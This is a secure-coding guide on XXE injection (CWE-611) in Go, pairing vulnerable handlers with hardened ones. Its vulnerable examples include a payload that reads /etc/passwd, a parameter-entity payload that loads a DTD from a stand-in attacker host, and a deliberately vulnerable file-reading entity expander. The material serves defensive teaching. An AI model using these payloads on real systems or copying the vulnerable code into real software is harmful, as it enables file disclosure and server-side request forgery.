CWE-611: XML External Entity (XXE) Injection - Go

Overview

XXE vulnerabilities in Go applications occur when XML parsers process external entity references in untrusted XML input. Go's standard encoding/xml package does not provide DTD validation or arbitrary external entity resolution; it recognizes the predefined XML entities and any extra replacements supplied through Decoder.Entity. The main XXE risk in Go comes from third-party XML libraries, native parser bindings, custom entity expansion, or forwarding accepted DTD-bearing XML into another component that resolves entities.

The xml.Decoder processes XML without fetching external entities, preventing the classic file-disclosure and SSRF forms of XXE when the standard library parser is used directly. Developers still need body-size limits, strict structure validation, and a review of any custom entity map or third-party parser configuration.

The Go ecosystem strongly favors JSON over XML for APIs and configuration, reducing XXE exposure. When XML processing is necessary (SOAP services, legacy integrations, XML configurations), understanding the security characteristics of encoding/xml and avoiding third-party parsers with unsafe defaults is critical. The simplicity of Go's standard library XML parser - with minimal configuration options - is a security advantage, as there are fewer knobs to misconfigure compared to feature-rich parsers in other languages.

Primary Defense: Use Go's standard encoding/xml package for untrusted XML, reject DOCTYPE/ENTITY declarations at the boundary when they are not required, and avoid third-party XML libraries unless they can explicitly disable external entity processing, external DTD loading, and DTD validation.

Common Vulnerable Patterns

Unsafe Assumption About DTDs in encoding/xml

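// VULNERABLE - Accepts DTD-bearing XML and forwards it downstream
package main

import (
    "encoding/xml"
    "fmt"
    "io"
    "net/http"
)

type Result struct {
    Data string `xml:"data"`
}

// forwardToLegacyXmlProcessor stands in for any downstream consumer
// (queue, SOAP gateway, batch job) that re-parses the raw XML.
func forwardToLegacyXmlProcessor(raw []byte) {}

func parseXMLHandler(w http.ResponseWriter, r *http.Request) {
    // No size limit, and the read error is ignored
    body, _ := io.ReadAll(r.Body)

    var result Result
    err := xml.Unmarshal(body, &result)
    if err != nil {
        http.Error(w, err.Error(), 400)
        return
    }

    // DANGEROUS: Storing or forwarding the original XML can expose
    // downstream processors that do resolve external entities.
    forwardToLegacyXmlProcessor(body)
    fmt.Fprintf(w, "Data: %s", result.Data)
}

// Attack XML:
// <?xml version="1.0"?>
// <!DOCTYPE foo [
//   <!ENTITY xxe SYSTEM "file:///etc/passwd">
// ]>
// <result><data>&xxe;</data></result>
//
// Note: encoding/xml in its default strict mode rejects the unknown &xxe;
// reference, so this exact payload gets a 400 from this handler. A variant
// that keeps its entity use inside the DTD (for example a parameter entity
// that points at an external DTD) parses cleanly and is forwarded.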

Why this is vulnerable: encoding/xml does not fetch the external entity, but this handler accepts XML containing DTD/entity declarations and forwards the original document to another XML processor. Boundary rejection avoids parser-specific behavior differences and prevents dangerous XML from reaching components with less restrictive defaults.
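
To make the distinction concrete, the following minimal sketch feeds two documents to xml.Unmarshal. The constant names, the parseResult helper, and the attacker.example URL are illustrative assumptions, not part of the handler above. With the decoder's default strict mode, an unknown general entity such as &xxe; in element content is a syntax error, while a DOCTYPE whose entity use stays inside the DTD is skipped as an opaque directive and the document parses without complaint.

```go
package main

import "encoding/xml"

// Result mirrors the struct used by the vulnerable handler.
type Result struct {
	Data string `xml:"data"`
}

// generalEntityDoc references &xxe; in element content.
const generalEntityDoc = `<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<result><data>&xxe;</data></result>`

// parameterEntityDoc keeps its entity use inside the DTD.
// The URL is a placeholder chosen for this sketch.
const parameterEntityDoc = `<?xml version="1.0"?>
<!DOCTYPE result [
  <!ENTITY % ext SYSTEM "http://attacker.example/evil.dtd">
  %ext;
]>
<result><data>ok</data></result>`

// parseResult unmarshals doc with encoding/xml's default (strict) settings.
func parseResult(doc string) (string, error) {
	var r Result
	if err := xml.Unmarshal([]byte(doc), &r); err != nil {
		return "", err
	}
	return r.Data, nil
}
```

Calling parseResult(generalEntityDoc) returns an error, whereas parseResult(parameterEntityDoc) succeeds without any network access. The second document is the kind of input that passes the Go parser untouched and only becomes dangerous once a different parser sees it.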

Third-Party XML Libraries

// VULNERABLE - Using CGo-based libxml2 binding
import (
    "io"
    "net/http"

    "github.com/lestrrat-go/libxml2"
)

func parseWithLibxml2(w http.ResponseWriter, r *http.Request) {
    body, _ := io.ReadAll(r.Body)

    // DANGEROUS: libxml2 may have unsafe defaults
    doc, err := libxml2.Parse(body)
    if err != nil {
        http.Error(w, err.Error(), 400)
        return
    }
    defer doc.Free()

    // Process document...
}

// Attack: Same XXE payload can trigger file disclosure
// if libxml2 has entity resolution enabled

Why this is vulnerable: Third-party libraries, especially those wrapping native XML parsers through CGo (libxml2, expat), may have different security features and defaults than Go's standard library. They can become vulnerable when external entity processing or DTD loading is enabled or not explicitly restricted. CGo dependencies also complicate deployment and security reviews.

Custom Entity Expansion or Preprocessing

// VULNERABLE - Application-level entity expansion
import (
    "os"
    "regexp"
)

var externalEntity = regexp.MustCompile(`<!ENTITY\s+(\w+)\s+SYSTEM\s+"file://([^"]+)"`)

func expandEntities(xmlData []byte) []byte {
    // DANGEROUS: Reimplements external entity expansion in application code.
    return externalEntity.ReplaceAllFunc(xmlData, func(match []byte) []byte {
        parts := externalEntity.FindSubmatch(match)
        if len(parts) != 3 {
            return match
        }
        data, _ := os.ReadFile(string(parts[2]))
        return data
    })
}

func parseUserXml(xmlData []byte) {
    expanded := expandEntities(xmlData)
    // expanded now contains attacker-selected local file contents
    _ = expanded
}

Why this is vulnerable: encoding/xml does not provide external entity resolution, but custom preprocessing can recreate the same vulnerability. Never implement SYSTEM/PUBLIC entity expansion for untrusted XML. If entity-like substitution is required for a trusted internal format, use a fixed allowlist of names and values that cannot read files or make network requests.

Unsafe Decoder Entity Map

// VULNERABLE - Entity map populated from attacker-controlled input
import (
    "encoding/xml"
    "io"
    "strings"
)

func parseWithCustomEntities(xmlData string, entities map[string]string) error {
    decoder := xml.NewDecoder(strings.NewReader(xmlData))
    decoder.Entity = entities // DANGEROUS if names or values are attacker-controlled

    for {
        _, err := decoder.Token()
        if err == io.EOF {
            return nil
        }
        if err != nil {
            return err
        }
    }
}

Why this is vulnerable: Decoder.Entity maps non-standard entity names to replacement strings. It does not fetch external resources by itself, but filling it from user input can create injection, memory amplification, or data-confusion bugs. Keep custom entity maps static and small, or reject custom entities entirely.
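
For a trusted internal format that genuinely needs a few custom entities, a static map is one way to follow this advice. The sketch below is a minimal illustration; the allowedEntities map, its names and values, the note type, and the decodeWithStaticEntities helper are all hypothetical.

```go
package main

import (
	"encoding/xml"
	"strings"
)

// allowedEntities is a fixed allowlist defined in code. The names and
// values are hypothetical; nothing here is derived from request data.
var allowedEntities = map[string]string{
	"product": "Example Product",
	"vendor":  "Example Corp",
}

// note captures the character data of the root element.
type note struct {
	Text string `xml:",chardata"`
}

// decodeWithStaticEntities decodes doc, expanding only the predefined XML
// entities and the names in allowedEntities. Any other entity reference is
// a syntax error because the decoder stays in its default strict mode.
func decodeWithStaticEntities(doc string) (string, error) {
	dec := xml.NewDecoder(strings.NewReader(doc))
	dec.Entity = allowedEntities // the decoder only reads from this map
	var n note
	if err := dec.Decode(&n); err != nil {
		return "", err
	}
	return n.Text, nil
}
```

With this setup, a document such as `<note>&product; by &vendor;</note>` decodes to plain text, and a reference to any name outside the map fails parsing instead of being silently passed through.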

DTD Validation Enabled

// POTENTIALLY VULNERABLE - Conceptual illustration only.
// encoding/xml has no DTD validation, so this handler is not exploitable
// as written. Picture the decoder replaced by a validating third-party
// parser that leaves external entity resolution enabled.
import (
    "bytes"
    "encoding/xml"
    "io"
    "net/http"
)

func parseWithValidation(w http.ResponseWriter, r *http.Request) {
    body, _ := io.ReadAll(r.Body)

    // If using a library that validates DTDs,
    // external entity references in the DTD could be processed
    decoder := xml.NewDecoder(bytes.NewReader(body))

    // Process XML...
    var result interface{}
    err := decoder.Decode(&result)
    if err != nil {
        http.Error(w, err.Error(), 400)
        return
    }
}

// Attack: DTD with external entity declarations

Why this is vulnerable: DTD validation can trigger external entity processing because DTDs can define entities that reference external resources. While Go's encoding/xml doesn't validate DTDs, third-party libraries that do can be vulnerable if they don't disable external entity resolution during validation.

Secure Patterns

Use encoding/xml for Untrusted XML

// SECURE - Standard library does not fetch external entities
package main

import (
    "encoding/json"
    "encoding/xml"
    "io"
    "log"
    "net/http"
)

type User struct {
    XMLName xml.Name `xml:"user"`
    Name    string   `xml:"name"`
    Email   string   `xml:"email"`
    Role    string   `xml:"role"`
}

func parseXMLHandler(w http.ResponseWriter, r *http.Request) {
    // Limit request body size to prevent DoS
    r.Body = http.MaxBytesReader(w, r.Body, 1048576) // 1MB limit
    defer r.Body.Close()

    body, err := io.ReadAll(r.Body)
    if err != nil {
        http.Error(w, "Request too large", http.StatusRequestEntityTooLarge)
        return
    }

    var user User
    // SECURE: encoding/xml does not fetch external entities
    err = xml.Unmarshal(body, &user)
    if err != nil {
        log.Printf("XML parse error: %v", err)
        http.Error(w, "Invalid XML", http.StatusBadRequest)
        return
    }

    // Validate parsed data
    if user.Name == "" || user.Email == "" {
        http.Error(w, "Missing required fields", http.StatusBadRequest)
        return
    }

    // Encode the response with encoding/json so that quotes or control
    // characters in user.Name cannot break the JSON structure.
    w.Header().Set("Content-Type", "application/json")
    json.NewEncoder(w).Encode(map[string]string{
        "status": "success",
        "name":   user.Name,
    })
}

Why this works: Go's encoding/xml parser does not resolve external SYSTEM/PUBLIC entities into file or network content. When DTD/entity declarations are not part of the expected input contract, reject them before parsing and use http.MaxBytesReader to limit upload size. Input validation after parsing ensures that even if unexpected XML passes parsing, the business logic will not process invalid data.
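
When the body is wrapped in http.MaxBytesReader, a failed read does not always mean the request was too large. The following sketch, which assumes Go 1.19 or newer for the *http.MaxBytesError type, separates the two cases. The readLimitedBody and statusFor names are hypothetical helpers introduced for this illustration.

```go
package main

import (
	"errors"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
)

// readLimitedBody reads at most limit bytes from the request body and
// returns the HTTP status that fits the outcome.
// Assumption: Go 1.19+, where MaxBytesReader reports *http.MaxBytesError.
func readLimitedBody(w http.ResponseWriter, r *http.Request, limit int64) ([]byte, int) {
	r.Body = http.MaxBytesReader(w, r.Body, limit)
	body, err := io.ReadAll(r.Body)
	if err != nil {
		var tooLarge *http.MaxBytesError
		if errors.As(err, &tooLarge) {
			return nil, http.StatusRequestEntityTooLarge
		}
		// Any other read failure (client disconnect, malformed chunking).
		return nil, http.StatusBadRequest
	}
	return body, http.StatusOK
}

// statusFor runs readLimitedBody against an in-memory request so the
// behavior can be checked without starting a server.
func statusFor(payload string, limit int64) int {
	req := httptest.NewRequest(http.MethodPost, "/", strings.NewReader(payload))
	_, status := readLimitedBody(httptest.NewRecorder(), req, limit)
	return status
}
```

In a handler, the returned status can be passed straight to http.Error before any XML parsing takes place.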

XML Decoder with Streaming (Large Documents)

// SECURE - Streaming XML parsing for large documents
import (
    "encoding/xml"
    "io"
    "net/http"
)

type Item struct {
    ID    string `xml:"id,attr"`
    Name  string `xml:"name"`
    Value string `xml:"value"`
}

func streamXMLHandler(w http.ResponseWriter, r *http.Request) {
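    // Cap the body size: streaming lowers memory use but does not bound
    // the input on its own. 10MB is an example value; size it to the feed.
    r.Body = http.MaxBytesReader(w, r.Body, 10<<20)
    defer r.Body.Close()

    // Create decoder from the size-limited request body
    decoder := xml.NewDecoder(r.Body)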

    // SECURE: Decoder also doesn't resolve external entities
    var items []Item

    for {
        token, err := decoder.Token()
        if err == io.EOF {
            break
        }
        if err != nil {
            http.Error(w, "Parse error", 400)
            return
        }

        // Process start elements
        if se, ok := token.(xml.StartElement); ok {
            if se.Name.Local == "item" {
                var item Item
                if err := decoder.DecodeElement(&item, &se); err != nil {
                    http.Error(w, "Decode error", 400)
                    return
                }
                items = append(items, item)
            }
        }
    }

    // Process items...
    w.WriteHeader(http.StatusOK)
}

Why this works: xml.NewDecoder() creates a streaming decoder that processes XML incrementally, so the raw document never has to be held in memory as a single buffer. xml.Unmarshal() is built on the same decoder, so the XXE behavior is identical: external entities are not resolved. Streaming also gives finer control over parsing, allowing the handler to reject documents with unexpected structure before the whole input has been read. Because a stream has no inherent end, pair it with a body-size limit and a cap on how many items are accumulated. This pattern suits SOAP services or XML feeds where documents may be large.
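
The structural control mentioned above can be sketched as a token loop that stops at the first surprise. This is a minimal illustration under assumed rules: the root element is named items, only item children are allowed, and the caller chooses maxItems. The decodeItems and decodeItemsFromString names and the error values are hypothetical.

```go
package main

import (
	"encoding/xml"
	"errors"
	"io"
	"strings"
)

type Item struct {
	ID    string `xml:"id,attr"`
	Name  string `xml:"name"`
	Value string `xml:"value"`
}

var (
	errDirective         = errors.New("DOCTYPE/ENTITY directives are not allowed")
	errUnexpectedElement = errors.New("unexpected element")
	errTooManyItems      = errors.New("too many items")
	errNoRoot            = errors.New("missing root element")
)

// decodeItems streams <items><item>...</item></items> from r and aborts
// as soon as the document leaves the expected shape.
func decodeItems(r io.Reader, maxItems int) ([]Item, error) {
	dec := xml.NewDecoder(r)
	var items []Item
	sawRoot := false
	for {
		tok, err := dec.Token()
		if err == io.EOF {
			if !sawRoot {
				return nil, errNoRoot
			}
			return items, nil
		}
		if err != nil {
			return nil, err
		}
		switch t := tok.(type) {
		case xml.Directive: // <!DOCTYPE ...> and similar declarations
			return nil, errDirective
		case xml.StartElement:
			switch {
			case !sawRoot:
				if t.Name.Local != "items" {
					return nil, errUnexpectedElement
				}
				sawRoot = true
			case t.Name.Local == "item":
				if len(items) >= maxItems {
					return nil, errTooManyItems
				}
				var it Item
				if err := dec.DecodeElement(&it, &t); err != nil {
					return nil, err
				}
				items = append(items, it)
			default:
				return nil, errUnexpectedElement
			}
		}
	}
}

// decodeItemsFromString is a convenience wrapper for small inputs and tests.
func decodeItemsFromString(doc string, maxItems int) ([]Item, error) {
	return decodeItems(strings.NewReader(doc), maxItems)
}
```

In an HTTP handler, decodeItems would receive the size-limited r.Body directly, so an oversized or malformed feed is rejected without buffering it first.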

Input Sanitization (Defense in Depth)

// SECURE - Reject XML with DOCTYPE declarations
import (
    "bytes"
    "encoding/xml"
    "io"
    "net/http"
)

func secureXMLHandler(w http.ResponseWriter, r *http.Request) {
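    // MaxBytesReader fails the read when the limit is exceeded, whereas
    // io.LimitReader would silently truncate the document.
    r.Body = http.MaxBytesReader(w, r.Body, 1048576) // 1MB limit
    defer r.Body.Close()

    body, err := io.ReadAll(r.Body)
    if err != nil {
        http.Error(w, "Request too large or unreadable", http.StatusBadRequest)
        return
    }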

    // SECURE: Reject XML with DOCTYPE (defense in depth)
    if containsDOCTYPE(body) {
        http.Error(w, "DOCTYPE declarations not allowed", 400)
        return
    }

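    // Decoding into interface{} only checks that the XML is well formed;
    // real handlers should unmarshal into a typed struct.
    var data interface{}
    err = xml.Unmarshal(body, &data)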
    if err != nil {
        http.Error(w, "Invalid XML", 400)
        return
    }

    w.WriteHeader(http.StatusOK)
}

func containsDOCTYPE(xmlData []byte) bool {
    upper := bytes.ToUpper(xmlData)
    return bytes.Contains(upper, []byte("<!DOCTYPE")) ||
        bytes.Contains(upper, []byte("<!ENTITY"))
}

Why this works: While encoding/xml doesn't fetch external entities, explicitly rejecting <!DOCTYPE> and <!ENTITY> declarations provides defense-in-depth and prevents dangerous XML from being stored, logged, forwarded, or later parsed by a different component. This check is an early boundary control; secure parser selection remains the primary control.
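
A byte search also flags documents that merely mention the text inside a comment or CDATA section. Where that matters, the same boundary check can be expressed against the decoder's token stream, which reports DOCTYPE and similar declarations as xml.Directive tokens. The sketch below is one possible variant, at the cost of an extra parsing pass; rejectDirectives and errDirectiveNotAllowed are hypothetical names.

```go
package main

import (
	"bytes"
	"encoding/xml"
	"errors"
	"io"
)

var errDirectiveNotAllowed = errors.New("xml: DOCTYPE/ENTITY directives are not allowed")

// rejectDirectives walks the token stream and fails on the first
// <!DOCTYPE ...>-style directive. Malformed XML is reported as well,
// through the decoder's own error.
func rejectDirectives(data []byte) error {
	dec := xml.NewDecoder(bytes.NewReader(data))
	for {
		tok, err := dec.Token()
		if err == io.EOF {
			return nil
		}
		if err != nil {
			return err
		}
		if _, ok := tok.(xml.Directive); ok {
			return errDirectiveNotAllowed
		}
	}
}
```

A handler would call rejectDirectives(body) before xml.Unmarshal and before storing or forwarding the raw bytes. Either form of the check is conservative; the token walk simply produces fewer false positives.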

Prefer JSON Over XML

// SECURE - Use JSON instead of XML (best practice)
import (
    "encoding/json"
    "io"
    "net/http"
)

type UserRequest struct {
    Name  string `json:"name"`
    Email string `json:"email"`
    Role  string `json:"role"`
}

func jsonHandler(w http.ResponseWriter, r *http.Request) {
    var user UserRequest

    // SECURE: JSON has no XML entity mechanism
    decoder := json.NewDecoder(io.LimitReader(r.Body, 1048576))
    decoder.DisallowUnknownFields() // Strict parsing

    err := decoder.Decode(&user)
    if err != nil {
        http.Error(w, "Invalid JSON", 400)
        return
    }
    defer r.Body.Close()

    // Validate
    if user.Name == "" || user.Email == "" {
        http.Error(w, "Missing fields", 400)
        return
    }

    // Process...
    w.Header().Set("Content-Type", "application/json")
    json.NewEncoder(w).Encode(map[string]string{
        "status": "success",
        "name":   user.Name,
    })
}

Why this works: JSON parsers have no concept of external entities, DTDs, or entity references. Using JSON instead of XML removes XXE from that input path. JSON is also simpler to parse, has broad client support, and generates smaller payloads. This is the recommended approach for new systems unless XML is required for compatibility with SOAP, SAML, or legacy systems.

Framework-Specific Guidance

Gin with XML Binding

// SECURE - Gin XML binding uses encoding/xml
package main

import (
    "net/http"

    "github.com/gin-gonic/gin"
)

type Config struct {
    AppName string `xml:"appname"`
    Version string `xml:"version"`
    Debug   bool   `xml:"debug"`
}

func main() {
    r := gin.Default()

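    // Limit request body size for every route. (MaxMultipartMemory only
    // controls multipart form buffering; it does not cap the body.)
    r.Use(func(c *gin.Context) {
        c.Request.Body = http.MaxBytesReader(c.Writer, c.Request.Body, 1<<20) // 1MB
        c.Next()
    })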

    r.POST("/config", configHandler)

    r.Run(":8080")
}

func configHandler(c *gin.Context) {
    var config Config

    // SECURE: Gin uses encoding/xml internally
    if err := c.ShouldBindXML(&config); err != nil {
        c.JSON(http.StatusBadRequest, gin.H{"error": "Invalid XML"})
        return
    }

    // Validate
    if config.AppName == "" {
        c.JSON(http.StatusBadRequest, gin.H{"error": "appname required"})
        return
    }

    c.JSON(http.StatusOK, gin.H{
        "status": "configured",
        "app":    config.AppName,
    })
}

Why this works: Gin's XML binding uses Go's standard encoding/xml package, so it does not fetch external entities. Keep request size limits, reject DTD/entity declarations if they are not expected, and validate the parsed struct before using it. Review separately if the application swaps in a custom XML binder or forwards raw XML to another service.

Echo XML Deserialization

// SECURE - Echo with XML binding
package main

import (
    "net/http"

    "github.com/labstack/echo/v4"
    "github.com/labstack/echo/v4/middleware"
)

type Message struct {
    To      string `xml:"to"`
    From    string `xml:"from"`
    Content string `xml:"content"`
}

func main() {
    e := echo.New()

    // Middleware
    e.Use(middleware.Logger())
    e.Use(middleware.Recover())
    e.Use(middleware.BodyLimit("1M")) // Limit body size

    e.POST("/message", messageHandler)

    // Log and exit if the server fails to start
    e.Logger.Fatal(e.Start(":8080"))
}

func messageHandler(c echo.Context) error {
    var msg Message

    // SECURE: Echo's default binder uses encoding/xml when the request
    // Content-Type is application/xml or text/xml
    if err := c.Bind(&msg); err != nil {
        return c.JSON(http.StatusBadRequest, map[string]string{
            "error": "Invalid XML",
        })
    }

    // Validate
    if msg.To == "" || msg.From == "" {
        return c.JSON(http.StatusBadRequest, map[string]string{
            "error": "Missing required fields",
        })
    }

    return c.JSON(http.StatusOK, map[string]interface{}{
        "status":  "received",
        "to":      msg.To,
        "from":    msg.From,
        "preview": msg.Content[:min(len(msg.Content), 50)],
    })
}

func min(a, b int) int {
    if a < b {
        return a
    }
    return b
}

Why this works: Echo's default XML binding uses encoding/xml, so it does not fetch external entities. The middleware.BodyLimit middleware enforces request size limits globally across all routes. Continue to reject DTD/entity declarations where they are not part of the API contract and validate all parsed fields.

Additional Resources